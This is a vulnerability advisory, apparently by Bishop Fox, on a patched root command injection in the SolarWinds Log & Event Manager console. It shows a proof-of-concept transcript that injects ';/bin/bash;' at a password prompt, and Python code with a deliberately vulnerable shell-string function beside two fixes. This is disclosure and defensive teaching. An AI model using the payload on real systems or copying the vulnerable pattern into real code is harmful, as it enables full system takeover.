SolarWinds Log & Event Manager - Arbitrary Command Injection


Patch Date

April 10, 2017

Reported Date

February 7, 2017

Vendor

SolarWinds

Systems Affected

SolarWinds Log & Event Manager (LEM) before 6.3.1 Hotfix 4

Summary

The Bishop Fox assessment team discovered an arbitrary command injection vulnerability in the SolarWinds Log & Event Manager (LEM) management console (CMC). The CMC is a restricted shell that provides functionality for upgrading and maintaining LEM appliances; it is not intended to give the operator a general-purpose shell on the appliance. This vulnerability allows an authenticated CMC user to bypass the restrictions the CMC imposes and execute arbitrary commands on the vulnerable system as the root user.

Vendor Status

The vendor has been notified and has issued patches.

Exploit Availability

To demonstrate the impact of this vulnerability, the assessment team entered shell syntax at the password prompt of the exportsyslog command to break out of the restricted LEM console and execute a system shell:

cmc> appliance
cmc::acm# exportsyslog
Press <enter> to begin export syslog process.
Available Log Files:
1. ( 53 kB) Authentication log
…omitted for brevity…
Log groups selected: 1 ( 1 kB )
Select log files to include (q to quit, * for all, n for none, twice to toggle): q
Please enter the network share path (e.g. \\myserver\myshare): \\server\share
Is the path \\server\share correct? <Y/n>
Please enter the username, including any domain information (e.g. DOMAIN\user): mydomain\user
Is the user mydomain\user correct? <Y/n>
Please enter the password: ';/bin/bash;'
Please verify the password: ';/bin/bash;'
Creating logfile archive...done.
Usage: smbclient [-?EgBVNkPeC] [-?|--help] [--usage]
[-R|--name-resolve=NAME-RESOLVE-ORDER] [-M|--message=HOST]
…omitted for brevity…
[-C|--use-ccache] service <password>
--(0)-[10.1.60.211]-[6.3.1]-[root@swi-lem]--
/usr/local/contego # id
uid=0(root) gid=0(root) groups=0(root)
--(0)-[10.1.60.211]-[6.3.1]-[root@swi-lem]--
/usr/local/contego # uname -a

As the proof of concept above shows, the password is handed to smbclient by way of a shell command line: the quote and semicolons end the smbclient invocation (hence the usage banner) and the injected /bin/bash then runs with the console's privileges. The resulting shell is uid 0, so the research team fully compromised the affected system by exploiting this vulnerability.
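The following is an added example and is not code from the advisory or from SolarWinds; the CMC's real implementation is not public and is not reproduced. It shows the shape of the defect (a prompt value spliced into a shell command line that runs smbclient) beside two fixes, and a tokenizer view of why the payload works. Assumptions: echo stands in for smbclient so the example runs offline, the argument layout is illustrative, and the non-interactive payload ';id;' replaces the advisory's ';/bin/bash;' so the demo terminates.

```python
"""
Added example (not from the Bishop Fox advisory or SolarWinds code): a
restricted console that shells out to smbclient, vulnerable and fixed.
"echo" is an assumed stand-in for smbclient so this runs offline.
"""
import shlex
import subprocess

# Constructed inputs mirroring the exportsyslog prompts in the advisory.
SHARE = r"\\server\share"
USER = r"mydomain\user"
INJECTED_PASSWORD = "';id;'"   # same quoting trick as the PoC, benign payload
TOOL = "echo"                  # assumption: stand-in for smbclient


def vulnerable_export(share, user, password, tool=TOOL):
    """Vulnerable pattern (CWE-78): untrusted input interpolated into one
    string that /bin/sh parses.  A closing quote plus ';' ends the smbclient
    command and starts a new one with the console's privileges."""
    cmd = f"{tool} '{share}' -U '{user}%{password}' -c 'put logs.tar.gz'"
    proc = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return proc.stdout


def safe_export(share, user, password, tool=TOOL):
    """Fix 1: no shell at all.  Each value is one argv element, so shell
    metacharacters in the password are just bytes inside that argument."""
    argv = [tool, share, "-U", f"{user}%{password}", "-c", "put logs.tar.gz"]
    proc = subprocess.run(argv, capture_output=True, text=True)
    return proc.stdout


def quoted_export(share, user, password, tool=TOOL):
    """Fix 2: if a shell string is unavoidable, quote every untrusted piece
    with shlex.quote so the shell sees a single literal word."""
    cmd = " ".join([tool, shlex.quote(share), "-U",
                    shlex.quote(f"{user}%{password}"),
                    "-c", shlex.quote("put logs.tar.gz")])
    proc = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return proc.stdout


def shell_words(cmd):
    """What a POSIX shell makes of a command string: with punctuation_chars
    enabled, ';' is returned as its own operator token, which is exactly the
    command boundary the injected password creates."""
    lexer = shlex.shlex(cmd, posix=True, punctuation_chars=True)
    return list(lexer)


if __name__ == "__main__":
    pw = INJECTED_PASSWORD
    print("tokens    :", shell_words(f"{TOOL} -U '{USER}%{pw}'"))
    print("vulnerable:", repr(vulnerable_export(SHARE, USER, pw)))  # has uid=
    print("argv      :", repr(safe_export(SHARE, USER, pw)))
    print("quoted    :", repr(quoted_export(SHARE, USER, pw)))
```

The argv form is the one to prefer; quoting is a fallback for code that must build a shell string. Either fix still puts the password in the process list of the appliance, so a real exporter should pass credentials to smbclient through its `-A` authentication-file option rather than on the command line, and a restricted console like the CMC should additionally allow-list what it accepts at each prompt.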

Researcher

Baker Hamilton, MD, MMSc of Bishop Fox

For Reference

CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')

CVE – CVE-2017-7647

LEM V6.3.1 HOT FIX 4 IS NOW AVAILABLE

The team at Bishop Fox would like to thank SolarWinds for their cooperation in quickly resolving this matter!


About the author, Baker Hamilton

Contractor

Baker Hamilton, MD, MMSc (OSCE, OSCP) is a Bishop Fox alumnus who focused on application penetration testing, internal and external network penetration testing, source code review, and red teaming.
